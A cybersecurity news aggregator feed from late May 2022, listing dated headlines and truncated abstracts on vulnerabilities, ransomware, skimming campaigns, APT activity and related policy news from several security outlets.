Zyxel has released patches to address four security flaws affecting its firewall, AP Controller, and AP products to execute arbitrary operating system commands and steal select information. The list of security vulnerabilities is as follows - CVE-2022-0734 - A cross-site scripting (XSS) vulnerability in some firewall versions that could be exploited to access information stored in the user's browser, such as cookies or session tokens, via a malicious script. CVE-2022-26531 - Several input validation flaws in command line interface (CLI) commands for some versions of firewall, AP controller, and AP devices that could be exploited to cause a system crash. CVE-2022-26532 - A command injection vulnerability in the " packet-trace " CLI command for some versions of firewall, AP controller, and AP devices that could lead to execution of arbitrary OS commands. CVE-2022-0910 - An authentication bypass vulnerability affecting select firewall versions that could pThe Hacker News
May 27, 2022 – Vulnerabilities
Experts released PoC exploit code for critical VMware CVE-2022-22972 flaw Full Text
Abstract
Security researchers released PoC exploit code for the critical authentication bypass vulnerability CVE-2022-22972 affecting multiple VMware products. Horizon3 security researchers have released a proof-of-concept (PoC) exploit and technical analysis...Security Affairs
May 26, 2022 – Phishing
Intuit warns of QuickBooks phishing threatening to suspend accounts Full Text
Abstract
Tax software vendor Intuit has warned that QuickBooks customers are being targeted in an ongoing series of phishing attacks impersonating the company and trying to lure them with fake account suspension warnings.BleepingComputer
May 26, 2022 – Outage
Ransomware Attack Disrupts Multiple Civil Services in Somerset County Full Text
Abstract
The county had to create temporary Gmail accounts so that residents can contact “critical departments such as the County Commissioners, Health, Emergency Operations, the County Clerk, Sheriff, and Surrogate.”The Record
May 26, 2022 – Vulnerabilities
Critical ‘Pantsdown’ BMC Vulnerability Affects QCT Servers Used in Data Centers Full Text
Abstract
Quanta Cloud Technology (QCT) servers have been identified as vulnerable to the severe "Pantsdown" Baseboard Management Controller (BMC) flaw, according to new research published today. "An attacker running code on a vulnerable QCT server would be able to 'hop' from the server host to the BMC and move their attacks to the server management network, possibly continue and obtain further permissions to other BMCs on the network and by doing that gaining access to other servers," firmware and hardware security firm Eclypsium said . A baseboard management controller is a specialized system used for remote monitoring and management of servers, including controlling low-level hardware settings as well as installing firmware and software updates. Tracked as CVE-2019-6260 (CVSS score: 9.8), the critical security flaw came to light in January 2019 and relates to a case of arbitrary read and write access to the BMC's physical address space, resulting in aThe Hacker News
May 26, 2022 – Phishing
Exposed: the threat actors who are poisoning Facebook Full Text
Abstract
An investigation of the infamous “Is That You?” video scam led Cybernews researchers into exposing threat actors who are poisoning Facebook Original post @ https://cybernews.com/security/exposed-the-threat-actors-who-are-poisoning-facebook/ An...Security Affairs
May 26, 2022 – Vulnerabilities
Windows 11 KB5014019 breaks Trend Micro ransomware protection Full Text
Abstract
This week's Windows optional cumulative update previews have introduced a compatibility issue with some of Trend Micro's security products that breaks some of their capabilities, including the ransomware protection feature.BleepingComputer
May 26, 2022 – Ransomware
New Chaos and Nokoyawa Ransomware Variants Found Full Text
Abstract
Security analysts spotted two new ransomware variants for Nokoyawa and Chaos ransomware, in two separate reports. Chaos' variant named Yashma includes two new improvements: the ability to stop execution on the basis of a victim's location and stop different running processes linked with antivirus a ... Read MoreCyware Alerts - Hacker News
May 26, 2022 – Malware
Experts Warn of Rise in ChromeLoader Malware Hijacking Users’ Browsers Full Text
Abstract
A malvertising threat is witnessing a new surge in activity since its emergence earlier this year. Dubbed ChromeLoader , the malware is a "pervasive and persistent browser hijacker that modifies its victims' browser settings and redirects user traffic to advertisement websites," Aedan Russell of Red Canary said in a new report. ChromeLoader is a rogue Chrome browser extension and is typically distributed in the form of ISO files via pay-per-install sites and baited social media posts that advertise QR codes to cracked video games and pirated movies. While it primarily functions by hijacking user search queries to Google, Yahoo, and Bing and redirecting traffic to an advertising site, it's also notable for its use of PowerShell to inject itself into the browser and get the extension added. The malware, also known as Choziosi Loader, was first documented by G DATA earlier this February. "For now the only purpose is getting revenue via unsolicited advertiThe Hacker News
May 26, 2022 – Vulnerabilities
Zyxel addresses four flaws affecting APs, AP controllers, and firewalls Full Text
Abstract
Zyxel addressed multiple vulnerabilities impacting many of its products, including APs, AP controllers, and firewalls. Zyxel has released security updates to address multiple vulnerabilities affecting multiple products, including firewall, AP, and AP controller...Security Affairs
May 26, 2022 – Vulnerabilities
OAS platform vulnerable to critical RCE and API access flaws Full Text
Abstract
Threat analysts have disclosed vulnerabilities affecting the Open Automation Software (OAS) platform, leading to device access, denial of service, and remote code execution.BleepingComputer
May 26, 2022 – Skimming
Credit Card Stealers Adopt Advanced Evasion Techniques Full Text
Abstract
Microsoft found that scammers are using image files with a hidden malicious PHP script to manipulate e-commerce checkout pages and capture payment card details in their latest attack campaigns. The attackers are obfuscating their code snippets, injecting them into image files, and masquerading as w ... Read MoreCyware Alerts - Hacker News
May 26, 2022 – Hacker
Hackers Increasingly Using Browser Automation Frameworks for Malicious Activities Full Text
Abstract
Cybersecurity researchers are calling attention to a free-to-use browser automation framework that's being increasingly used by threat actors as part of their attack campaigns. "The framework contains numerous features which we assess may be utilized in the enablement of malicious activities," researchers from Team Cymru said in a new report published Wednesday. "The technical entry bar for the framework is purposefully kept low, which has served to create an active community of content developers and contributors, with actors in the underground economy advertising their time for the creation of bespoke tooling." The U.S. cybersecurity company said it observed command-and-control (C2) IP addresses associated with malware such as Bumblebee , BlackGuard , and RedLine Stealer establishing connections to the downloads subdomain of Bablosoft ("downloads.bablosoft[.]com"), the maker of the Browser Automation Studio (BAS). Bablosoft was previouslyThe Hacker News
May 26, 2022 – Attack
Experts warn of a new malvertising campaign spreading the ChromeLoader Full Text
Abstract
Researchers warn of a new malvertising campaign spreading the ChromeLoader malware that hijacks the victims' browsers. Researchers from Red Canary observed a new malvertising campaign spreading the ChromeLoader malware that hijacks the victims' browsers. ChromeLoader...Security Affairs
May 26, 2022 – Vulnerabilities
Exploit released for critical VMware auth bypass bug, patch now Full Text
Abstract
Proof-of-concept exploit code is now available online for a critical authentication bypass vulnerability in multiple VMware products that allows attackers to gain admin privileges.BleepingComputer
May 26, 2022 – Vulnerabilities
Quanta Servers Caught With ‘Pantsdown’ BMC Vulnerability Full Text
Abstract
Several Quanta Cloud Technology (QCT) server models are vulnerable to a critical firmware vulnerability that puts them at risk of attacks that take full control over the server — and that can spread across numerous servers on the same network.Dark Reading
May 26, 2022 – Vulnerabilities
The Added Dangers Privileged Accounts Pose to Your Active Directory Full Text
Abstract
In any organization, there are certain accounts that are designated as being privileged. These privileged accounts differ from standard user accounts in that they have permission to perform actions that go beyond what standard users can do. The actions vary based on the nature of the account but can include anything from setting up new user accounts to shutting down mission-critical systems. Privileged accounts are essential tools. Without these accounts, the IT staff would be unable to do its job. At the same time, privileged accounts can pose a serious threat to an organization's security. Added risk of a privileged account Imagine for a moment that a hacker manages to steal a standard user's password and is able to log in as that user. Even though the hacker would have access to certain resources at that point, they would be constrained by the user's privileges (or lack thereof). In other words, the hacker would be able to browse the Internet, open some applications, and accessThe Hacker News
May 26, 2022 – Vulnerabilities
Do not use Tails OS until a flaw in the bundled Tor Browser will be fixed Full Text
Abstract
The maintainers of the Tails project (The Amnesic Incognito Live System) warn users that the Tor Browser bundled with the OS could expose their sensitive information. The maintainers confirmed that Tor Browser in Tails 5.0 and earlier is unsafe...Security Affairs
May 26, 2022 – Attack
Microsoft shares mitigation for Windows KrbRelayUp LPE attacks Full Text
Abstract
Microsoft has shared guidance to help admins defend their Windows enterprise environments against KrbRelayUp attacks that enable attackers to gain SYSTEM privileges on Windows systems with default configurations.BleepingComputer
May 26, 2022 – Business
Broadcom announces plans to buy VMware in $61 billion deal Full Text
Abstract
Broadcom will buy VMware in a cash-and-stock transaction valued at $61 billion, based on the closing price of Broadcom common stock on May 25, 2022, the companies announced Thursday.CNBC
May 26, 2022 – Vulnerabilities
Tails OS Users Advised Not to Use Tor Browser Until Critical Firefox Bugs are Patched Full Text
Abstract
The maintainers of the Tails project have issued a warning that the Tor Browser that's bundled with the operating system is unsafe to use for accessing or entering sensitive information. "We recommend that you stop using Tails until the release of 5.1 (May 31) if you use Tor Browser for sensitive information (passwords, private messages, personal information, etc.)," the project said in an advisory issued this week. Tails, short for The Amnesic Incognito Live System, is a security-oriented Debian-based Linux distribution aimed at preserving privacy and anonymity by connecting to the internet through the Tor network. The alert comes as Mozilla on May 20, 2022 rolled out fixes for two critical zero-day flaws in its Firefox browser, a modified version of which acts as the foundation of the Tor Browser. Tracked as CVE-2022-1802 and CVE-2022-1529, the two vulnerabilities are what's referred to as prototype pollution that could be weaponized to gain JavaScript cThe Hacker News
May 26, 2022 – Government
Italy announced its National Cybersecurity Strategy 2022/26 Full Text
Abstract
Italy announced its National Cybersecurity Strategy for 2022/26, a crucial document to address cyber threats and increase the resilience of the country. Italy presented its National Cybersecurity Strategy for 2022/26 and reinforce the government's...Security Affairs
May 26, 2022 – Vulnerabilities
Zyxel warns of flaws impacting firewalls, APs, and controllers Full Text
Abstract
Zyxel has published a security advisory to warn admins about multiple vulnerabilities affecting a wide range of firewall, AP, and AP controller products.BleepingComputer
May 26, 2022 – Breach
Update: Conti leaks data stolen during January attack on Oregon county Full Text
Abstract
Darrin Lane, administrative officer for Linn County, told The Record that the attack began on the morning of January 24 and that the county’s IT team immediately began shutting down systems in order to limit the damage.The Record
May 26, 2022 – Policy and Law
Twitter Fined $150 Million for Misusing Users’ Data for Advertising Without Consent Full Text
Abstract
Twitter, which is in the process of being acquired by Tesla CEO Elon Musk, has agreed to pay $150 million to the U.S. Federal Trade Commission (FTC) to settle allegations that it abused non-public information collected for security purposes to serve targeted ads. In addition to the monetary penalty for "misrepresenting its privacy and security practices," the company has been banned from profiting from the deceptively collected data and ordered to notify all affected users. "Twitter obtained data from users on the pretext of harnessing it for security purposes but then ended up also using the data to target users with ads," FTC Chair Lina M. Khan said in a statement. "This practice affected more than 140 million Twitter users, while boosting Twitter's primary source of revenue." According to a complaint filed by the U.S. Justice Department, Twitter in May 2013 began enforcing a requirement for users to provide either a phone number or email adThe Hacker News
May 26, 2022 – General
Industrial Spy data extortion market gets into the ransomware game Full Text
Abstract
The Industrial Spy data extortion marketplace has now launched its own ransomware operation, where they now also encrypt victim's devices.BleepingComputer
May 26, 2022 – Malware
New ERMAC 2.0 Android malware steals accounts, wallets from 467 apps Full Text
Abstract
The ERMAC Android banking trojan has released version 2.0, increasing the number of applications targeted from 378 to 467, covering a much wider range of apps to steal account credentials and crypto wallets.BleepingComputer
May 25, 2022 – Ransomware
New ‘Cheers’ Linux ransomware targets VMware ESXi servers Full Text
Abstract
A new ransomware named 'Cheers' has appeared in the cybercrime space and has started its operations by targeting vulnerable VMware ESXi servers.BleepingComputer
May 25, 2022 – Vulnerabilities
Vulnerabilities in Open Automation Software Platform could lead to information disclosure, denial of service Full Text
Abstract
Cisco Talos discovered eight vulnerabilities that could allow an adversary to carry out a variety of malicious actions, including improperly authenticating into the targeted device and causing a denial of service.Cisco Talos
May 25, 2022 – Criminals
Interpol Arrest Leader of SilverTerrier Cybercrime Gang Behind BEC Attacks Full Text
Abstract
A year-long international investigation has resulted in the arrest of the suspected head of the SilverTerrier cybercrime group by the Nigeria Police Force. "The suspect is alleged to have run a transnational cybercrime syndicate that launched mass phishing campaigns and business email compromise schemes targeting companies and individual victims," Interpol said in a statement. Operation Delilah, as the coordinated international effort is called, involved tracking the 37-year-old Nigerian man's physical movements, before he was apprehended at Murtala Mohammed International Airport in Lagos. Singapore-headquartered cybersecurity company Group-IB said it provided threat intelligence that led to the arrest as part of the police operation that commenced in May 2021. The development is the third in a series of law enforcement actions aimed at the identification and arrest of the suspected members of the SilverTerrier gang (aka TMT). In November 2020, three alleged mThe Hacker News
May 25, 2022 – Malware
New ChromeLoader malware surge threatens browsers worldwide Full Text
Abstract
The ChromeLoader malware is seeing an uptick in detections this month, following a relatively stable operation volume since the start of the year, which means that the malvertiser is now becoming a widespread threat.BleepingComputer
May 25, 2022 – Breach
Washington University School of Medicine notifies patients of data breach Full Text
Abstract
According to the Washington University School of Medicine's website, the health system learned that an unauthorized person gained access to certain employee email accounts between March 4 and March 28.Becker’s Health IT Review
May 25, 2022 – Privacy
Lumos System Can Find Hidden Cameras and IoT Devices in Your Airbnb or Hotel Room Full Text
Abstract
A group of academics has devised a system that can be used on a phone or a laptop to identify and locate Wi-Fi-connected hidden IoT devices in unfamiliar physical spaces. With hidden cameras being increasingly used to snoop on individuals in hotel rooms and Airbnbs, the goal is to be able to pinpoint such rogue devices without much of a hassle. The system, dubbed Lumos , is designed with this intent in mind and to "visualize their presence using an augmented reality interface," said Rahul Anand Sharma, Elahe Soltanaghaei, Anthony Rowe, and Vyas Sekar of Carnegie Mellon University in a new paper. At its core, the platform works by snuffing and collecting encrypted wireless packets over the air to detect and identify concealed devices. Subsequently, it estimates the location of each identified device with respect to the user as they walk around the perimeter of the space. The localization module, for its part, combines signal strength measurements that are availThe Hacker News
May 25, 2022 – Vulnerabilities
Tails 5.0 Linux users warned against using it “for sensitive information” Full Text
Abstract
Tails developers have warned users to stop using the portable Debian-based Linux distro until the next release if they're entering or accessing sensitive information using the bundled Tor Browser application.BleepingComputer
May 25, 2022 – Malware
Windows Exploits Used to Target Infosec Community Full Text
Abstract
Cyble researchers spotted a malware campaign targeting the infoSec community via a fake PoC exploit code for RPC Runtime RCE flaw. The fake exploit was distributed via GitHub. By attacking the infosec community, attackers are probably trying to gain access to vulnerability research or steal other p ... Read MoreCyware Alerts - Hacker News
May 25, 2022 – Education
How Secrets Lurking in Source Code Lead to Major Breaches Full Text
Abstract
If one word could sum up the 2021 infosecurity year (well, actually three), it would be these: "supply chain attack". A software supply chain attack happens when hackers manipulate the code in third-party software components to compromise the 'downstream' applications that use them. In 2021, we have seen a dramatic rise in such attacks: high profile security incidents like the SolarWinds, Kaseya, and Codecov data breaches have shaken enterprise's confidence in the security practices of third-party service providers. What does this have to do with secrets, you might ask? In short, a lot. Take the Codecov case (we'll go back to it quickly): it is a textbook example to illustrate how hackers leverage hardcoded credentials to gain initial access into their victims' systems and harvest more secrets down the chain. Secrets-in-code remains one of the most overlooked vulnerabilities in the application security space, despite being a priority target in hackThe Hacker News
May 25, 2022 – Criminals
Darknet market Versus shuts down after hacker leaks security flaw Full Text
Abstract
The Versus Market, one of the most popular English-speaking criminal darknet markets, is shutting down after discovering a severe exploit that could have allowed access to its database and exposed the IP address of its servers.BleepingComputer
May 25, 2022 – Ransomware
New Linux-Based Ransomware ‘Cheerscrypt’ Targets VMware ESXi Servers Full Text
Abstract
In the past, ESXi servers were also attacked by other known ransomware families such as LockBit, Hive, and RansomEXX as an efficient way to infect many computers with ransomware.Trend Micro
May 25, 2022 – Education
Learn How Hackers Can Hijack Your Online Accounts Even Before You Create Them Full Text
Abstract
Malicious actors can gain unauthorized access to users' online accounts via a new technique called "account pre-hijacking," new research has found. The attack takes aim at the account creation process that's ubiquitous in websites and other online platforms, enabling an adversary to perform a set of actions before an unsuspecting victim creates an account in a target service. The study was led by independent security researcher Avinash Sudhodanan in collaboration with Andrew Paverd of the Microsoft Security Response Center (MSRC). Pre-hijacking banks on the prerequisite that an attacker is already in possession of a unique identifier associated with a victim, such as an email address or phone number, which can be obtained either from the target's social media accounts or credential dumps circulating on the web. The attacks can then play out in five different ways, including the use of the same email address during account creation by both the adversary and tThe Hacker News
May 25, 2022 – General
Is 100% Cybersecurity Readiness Possible? Medical Device Pros Weigh In Full Text
Abstract
As medical devices become more connected and reliant on software, their codebase grows both in size and complexity, and they are increasingly reliant on third-party and open source software components. Learn more from 150 senior decision makers who oversee product security or cybersecurity compliance in the medical device industry,BleepingComputer
May 25, 2022 – Denial Of Service
Pro-Iran Group ALtahrea Hits Port of London Website by DDoS Attack Full Text
Abstract
The Port of London Authority/PLA has become the latest victim of a cyberattack that caused the forced shut down of its website, the company confirmed on Tuesday, May 24th.Hackread
May 25, 2022 – Attack
Researchers Find New Malware Attacks Targeting Russian Government Entities Full Text
Abstract
An unknown advanced persistent threat (APT) group has been linked to a series of spear-phishing attacks targeting Russian government entities since the onset of the Russo-Ukrainian war in late February 2022. "The campaigns [...] are designed to implant a Remote Access Trojan (RAT) that can be used to surveil the computers it infects, and run commands on them remotely," Malwarebytes said in a technical report published Tuesday. The cybersecurity company attributed the attacks with low confidence to a Chinese hacking group, citing infrastructure overlaps between the RAT and Sakula Rat malware used by a threat actor known as Deep Panda . The attack chains, while leveraging different lures over the course of two months, all employed the same malware barring small differences in the source code. The campaign is said to have commenced around February 26, days after Russia's military invasion of Ukraine, with the emails distributing the RAT under the guise of an interacThe Hacker News
May 25, 2022 – Hacker
Hacker says hijacking libraries, stealing AWS keys was ethical research Full Text
Abstract
The hacker of 'ctx' and 'PHPass' libraries has now broken silence and explained the reasons behind this hijack to BleepingComputer. According to the hacker, this was a bug bounty exercise and no malicious activity was intended.BleepingComputer
May 25, 2022 – Vulnerabilities
Chrome 102 Patches 32 Vulnerabilities Full Text
Abstract
The critical security hole, tracked as CVE-2022-1853, has been described as a use-after-free bug affecting Indexed DB. Google learned about it on May 12 and it has yet to determine the bug bounty for this vulnerability.Security Week
May 25, 2022 – General
[Template] Incident Response for Management Presentation Full Text
Abstract
Security incidents occur. It's not a matter of "if," but of "when." That's why you implemented security products and procedures to optimize the incident response (IR) process. However, many security pros who are doing an excellent job in handling incidents find effectively communicating the ongoing process with their management a much more challenging task. Feels familiar? In many organizations, leadership is not security savvy, and they aren't interested in the details regarding all the bits and bytes in which the security pro masters. Luckily, there is a template that security leads can use when presenting to management. It's called the IR Reporting for Management template , providing CISOs and CIOs with a clear and intuitive tool to report both the ongoing IR process and its conclusion. The IR Reporting for Management template enables CISOs and CIOs to communicate with the two key points that management cares about—assurance that the incidThe Hacker News
May 25, 2022 – Policy and Law
Interpol arrests alleged leader of the SilverTerrier BEC gang Full Text
Abstract
After a year-long investigation that involved Interpol and several cybersecurity companies, the Nigeria Police Force has arrested an individual believed to be in the top ranks of a prominent business email compromise (BEC) group known as SilverTerrier or TMT.BleepingComputer
May 25, 2022 – Malware
Credit Card Stealer Targets PsiGate Payment Gateway Software Full Text
Abstract
The malware injection leverages the #psigate_cc_number, #psigate_expiration, #psigate_expiration_yr and #psigate_cc_cid fields (among others) to harvest customer’s payment data and details whenever the text fields are submitted on the checkout page.Sucuri
May 25, 2022 – Attack
SpiceJet airline passengers stranded after ransomware attack Full Text
Abstract
Indian low-cost airline SpiceJet has informed its customers of an attempted ransomware attack that has impacted some of its systems and caused delays on flight departures today.BleepingComputer
May 25, 2022 – Malware
BPFDoor malware uses Solaris vulnerability to get root privileges Full Text
Abstract
New research into the inner workings of the stealthy BPFdoor malware for Linux and Solaris reveals that the threat actor behind it leveraged an old vulnerability to achieve persistence on targeted systems.BleepingComputer
May 25, 2022 – APT
Unknown APT group is targeting Russian government entities Full Text
Abstract
An unknown APT group is targeting Russian government entities since the beginning of the Russian invasion of Ukraine. Researchers from Malwarebytes observed an unknown Advanced Persistent Threat (APT) group targeting Russian government entities with...Security Affairs
May 25, 2022 – Ransomware
Link Found Connecting Chaos, Onyx and Yashma Ransomware Full Text
Abstract
A slip-up by a malware author has allowed researchers to taxonomize three ransomware variations going by different names.Threatpost
May 25, 2022 – Criminals
Internationa police operation led to the arrest of the SilverTerrier gang leader Full Text
Abstract
The Nigeria Police Force has arrested the suspected leader of the SilverTerrier cybercrime group as a result of an international operation. The Nigeria Police Force has arrested the suspected leader of the SilverTerrier cybercrime gang (aka TMT) after...Security Affairs
May 25, 2022 – Vulnerabilities
Zoom Patches ‘Zero-Click’ RCE Bug Full Text
Abstract
The Google Project Zero researcher found a bug in XML parsing on the Zoom client and server.Threatpost
May 25, 2022 – Vulnerabilities
Chaining Zoom bugs is possible to hack users in a chat by sending them a message Full Text
Abstract
Security flaws in Zoom can be exploited to compromise another user over chat by sending specially crafted messages. A set of four security flaws in the popular video conferencing service Zoom could be exploited to compromise another user over chat...Security Affairs
May 25, 2022 – General
Verizon Report: Ransomware, Human Error Among Top Security Risks Full Text
Abstract
2022’s DBIR also highlighted the far-reaching impact of supply-chain breaches and how organizations and their employees are the reasons why incidents occur.Threatpost
May 25, 2022 – Government
CISA adds 41 flaws to its Known Exploited Vulnerabilities Catalog Full Text
Abstract
US Critical Infrastructure Security Agency (CISA) adds 41 new vulnerabilities to its Known Exploited Vulnerabilities Catalog. The Cybersecurity & Infrastructure Security Agency (CISA) has added 41 flaws to its Known Exploited Vulnerabilities Catalog,...Security Affairs
May 24, 2022 – Privacy
DuckDuckGo browser allows Microsoft trackers due to search agreement Full Text
Abstract
The privacy-focused DuckDuckGo browser purposely allows Microsoft trackers on third-party sites due to an agreement in their syndicated search content contract between the two companies.BleepingComputer
May 24, 2022 – APT
Twisted Panda: Chinese APT Targets Russian Orgs Full Text
Abstract
The targeted attack, dubbed Twisted Panda, has been going on since at least June 2021 and spied on at least two Russian defense research institutes and another unknown target in Belarus.Cyware Alerts - Hacker News
May 24, 2022 – Breach
Popular PyPI Package ‘ctx’ and PHP Library ‘phpass’ Hijacked to Steal AWS Keys Full Text
Abstract
Two trojanized Python and PHP packages have been uncovered in what's yet another instance of a software supply chain attack targeting the open source ecosystem. One of the packages in question is "ctx," a Python module available in the PyPi repository. The other involves "phpass," a PHP package that's been forked on GitHub to distribute a rogue update. "In both cases the attacker appears to have taken over packages that have not been updated in a while," the SANS Internet Storm Center (ISC) said , one of whose volunteer incident handlers, Yee Ching, analyzed the ctx package. It's worth noting that ctx was last published to PyPi on December 19, 2014. On the other hand, phpass hasn't received an update since it was uploaded to Packagist on August 31, 2012. The malicious Python package, which was pushed to PyPi on May 21, 2022, has been removed from the repository , but the PHP library still continues to be available on GitHub. In bThe Hacker News
May 24, 2022 – Vulnerabilities
Trend Micro addressed a flaw exploited by China-linked Moshen Dragon APT Full Text
Abstract
Trend Micro addressed a DLL hijacking issue in Trend Micro Security actively exploited by a China-linked threat group to deploy malware. Trend Micro addressed a DLL hijacking flaw in Trend Micro Security that a China-linked threat actor actively exploited...Security Affairs
May 24, 2022 – Vulnerabilities
Mozilla fixes Firefox, Thunderbird zero-days exploited at Pwn2Own Full Text
Abstract
Mozilla has released security updates for multiple products to address zero-day vulnerabilities exploited during the Pwn2Own Vancouver 2022 hacking contest.BleepingComputer
May 24, 2022 – Vulnerabilities
Corrupted PyPI Package Opens Backdoors for Different OSes Full Text
Abstract
Sonatype warns developers against malicious packages in the PyPI registry that were rooted by cybercriminals to perform supply chain attacks by deploying Cobalt Strike beacons and backdoors on Windows, macOS, and Linux systems. It could provide hackers initial access to the developer's network for ... Read MoreCyware Alerts - Hacker News
May 24, 2022 – Solution
SIM-based Authentication Aims to Transform Device Binding Security to End Phishing Full Text
Abstract
Let's face it: we all use email, and we all use passwords. Passwords create inherent vulnerability in the system. The success rate of phishing attacks is skyrocketing , and opportunities for the attack have greatly multiplied as lives moved online. All it takes is one password to be compromised for all other users to become victims of a data breach. To deliver additional security, therefore, digital identities rely on verification plasters. MFA (multi-factor authentication) often falls back to knowledge factors such as password resets and OTP codes, but these are still vulnerable. As long as credentials can be shared or intercepted, they can be misused. What is needed is a paradigm shift – from knowledge-based credentials to strong possession-factor security that can't be compromised, alongside other verification security such as biometrics. A new possession-factor API now aims to do precisely that, replacing knowledge-based credentials, by using the SIM card for possessThe Hacker News
May 24, 2022 – Skimming
Microsoft warns of new highly evasive web skimming campaigns Full Text
Abstract
Threat actors behind web skimming campaigns are using malicious JavaScript to mimic Google Analytics and Meta Pixel scripts to avoid detection. Microsoft security researchers recently observed web skimming campaigns that used multiple obfuscation...Security Affairs
May 24, 2022 – Attack
Hackers target Russian govt with fake Windows updates pushing RATs Full Text
Abstract
Hackers are targeting Russian government agencies with phishing emails that pretend to be Windows security updates and other lures to install remote access malware.BleepingComputer
May 24, 2022 – Malware
Nation-state malware could become a commodity on dark web soon, Interpol warns Full Text
Abstract
In the ongoing conflict between Russia and Ukraine, the malware developed by both nation-state actors and non state actors represents a serious risk for critical infrastructure and organizations worldwide.Security Affairs
May 24, 2022 – Ransomware
New Chaos Ransomware Builder Variant “Yashma” Discovered in the Wild Full Text
Abstract
Cybersecurity researchers have disclosed details of the latest version of the Chaos ransomware line, dubbed Yashma. "Though Chaos ransomware builder has only been in the wild for a year, Yashma claims to be the sixth version (v6.0) of this malware," BlackBerry research and intelligence team said in a report shared with The Hacker News. Chaos is a customizable ransomware builder that emerged in underground forums on June 9, 2021, by falsely marketing itself as the .NET version of Ryuk despite sharing no such overlaps with the notorious counterpart. The fact that it's offered for sale also means that any malicious actor can purchase the builder and develop their own ransomware strains, turning it into a potent threat. It has since undergone five successive iterations aimed at improving its functionalities: version 2.0 on June 17, version 3.0 on July 5, version 4.0 on August 5, and version 5.0 in early 2022. While the first three variants of Chaos functioned more lThe Hacker News
May 24, 2022 – General
Nation-state malware could become a commodity on dark web soon, Interpol warns Full Text
Abstract
Interpol Secretary warns that nation-state malware will become available on the cybercrime underground in a couple of years. Interpol Secretary General Jurgen Stock declared that nation-state malwre will become available on the darknet in a couple...Security Affairs
May 24, 2022 – Malware
Microsoft: Credit card stealers are getting much stealthier Full Text
Abstract
Microsoft's security researchers have observed a worrying trend in credit card skimming, where threat actors employ more advanced techniques to hide their malicious info-stealing code.BleepingComputer
May 24, 2022 – General
How confident are CISOs about their security posture? Full Text
Abstract
According to a new report by Proofpoint, many CISOs now feel much more in control of their environment. 48% feel that their organization is at risk of suffering a material cyber attack in the next 12 months, down from 64% last year.Help Net Security
May 24, 2022 – Malware
Malware Analysis: Trickbot Full Text
Abstract
In this day and age, we are not dealing with roughly pieced together, homebrew type of viruses anymore. Malware is an industry, and professional developers are found to exchange, be it by stealing one's code or deliberate collaboration. Attacks are multi-layer these days, with diverse sophisticated software apps taking over different jobs along the attack-chain from initial compromise to ultimate data exfiltration or encryption. The specific tools for each stage are highly specialized and can often be rented as a service, including customer support and subscription models for professional (ab)use. Obviously, this has largely increased both the availability and the potential effectiveness and impact of malware. Sound scary? Well, it does, but the apparent professionalization actually does have some good sides too. One factor is that certain reused modules commonly found in malware can be used to identify, track, and analyze professional attack software. Ultimately this means thatThe Hacker News
May 24, 2022 – Government
CISA adds 41 vulnerabilities to list of bugs used in cyberattacks Full Text
Abstract
The Cybersecurity & Infrastructure Security Agency (CISA) has added 41 vulnerabilities to its catalog of known exploited flaws over the past two days, including flaws for the Android kernel and Cisco IOS XR.BleepingComputer
May 24, 2022 – APT
Unknown APT group has targeted Russia repeatedly since Ukraine invasion Full Text
Abstract
An unknown Advanced Persistent Threat (APT) group has targeted Russian government entities through at least four separate spear-phishing campaigns since late February 2022.Malwarebytes Labs
May 24, 2022 – Criminals
Conti Ransomware Operation Shut Down After Splitting into Smaller Groups Full Text
Abstract
Even as the operators of Conti threatened to overthrow the Costa Rican government , the notorious cybercrime gang officially took down their infrastructure in favor of migrating their criminal activities to other ancillary operations, including Karakurt and BlackByte. "From the negotiations site, chatrooms, messengers to servers and proxy hosts - the Conti brand, not the organization itself, is shutting down," AdvIntel researchers Yelisey Bogusalvskiy and Vitali Kremez said in a report. "However, this does not mean that the threat actors themselves are retiring." The voluntary termination, with the exception of its name-and-shame blog, is said to have occurred on May 19, 2022, while an organizational rejig was happening simultaneously to ensure a smooth transition of the ransomware group's members. AdvIntel said Conti, which is also tracked under the moniker Gold Ulrick , orchestrated its own demise by utilizing information warfare techniques. The disbThe Hacker News
May 24, 2022 – Government
US Senate: Govt’s ransomware fight hindered by limited reporting Full Text
Abstract
A report published today by U.S. Senator Gary Peters, Chairman of the Senate Homeland Security and Governmental Affairs Committee, says law enforcement and regulatory agencies lack insight into ransomware attacks to fight against them effectively.BleepingComputer
May 24, 2022 – General
Paying the ransom is not a good recovery strategy Full Text
Abstract
Businesses are losing the battle when it comes to defending against ransomware attacks, according to a Veeam report, which found that 72% of organizations had partial or complete attacks on their backup repositories.Help Net Security
May 24, 2022 – Criminals
Microsoft Warns of Web Skimmers Mimicking Google Analytics and Meta Pixel Code Full Text
Abstract
Threat actors behind web skimming campaigns are leveraging malicious JavaScript code that mimics Google Analytics and Meta Pixel scripts in an attempt to sidestep detection. "It's a shift from earlier tactics where attackers conspicuously injected malicious scripts into e-commerce platforms and content management systems (CMSs) via vulnerability exploitation, making this threat highly evasive to traditional security solutions," Microsoft 365 Defender Research Team said in a new report. Skimming attacks, such as those by Magecart, are carried out with the goal of harvesting and exporting users' payment information, such as credit card details, entered into online payment forms in e-commerce platforms, typically during the checkout process. This is achieved by taking advantage of security vulnerabilities in third-party plugins and other tools to inject rogue JavaScript code into the online portals without the owners' knowledge. As skimming attacks have increThe Hacker News
May 24, 2022 – Vulnerabilities
Screencastify Chrome extension flaws allow webcam hijacks Full Text
Abstract
The popular Screencastify Chrome extension has fixed a vulnerability that allowed malicious sites to hijack users' webcams and steal recorded videos. However, security flaws still exist that could be exploited by unscrupulous insiders.BleepingComputer
May 24, 2022 – Breach
Hackers Breach Zola Wedding Registry Accounts and Make Fraudulent Purchases Full Text
Abstract
The popular wedding planning website Zola confirmed Monday that hackers had managed to access the accounts of a number of its users and tried to initiate fraudulent cash transfers.The Verge
May 24, 2022 – Vulnerabilities
Trend Micro fixes bug Chinese hackers exploited for espionage Full Text
Abstract
Trend Micro says it patched a DLL hijacking flaw in Trend Micro Security used by a Chinese threat group to side-load malicious DLLs and deploy malware.BleepingComputer
May 24, 2022 – General
Vishing cases reach all time high Full Text
Abstract
Vishing (voice phishing) cases have increased almost 550 percent over the last twelve months (Q1 2022 to Q1 2021), according to the latest Quarterly Threat Trends & Intelligence Report from Agari and PhishLabs.Help Net Security
May 24, 2022 – Vulnerabilities
Researchers to release exploit for new VMware auth bypass, patch now Full Text
Abstract
Proof-of-concept exploit code is about to be published for a vulnerability that allows administrative access without authentication in several VMware products.BleepingComputer
May 24, 2022 – Breach
Popular Python and PHP libraries hijacked to steal AWS keys Full Text
Abstract
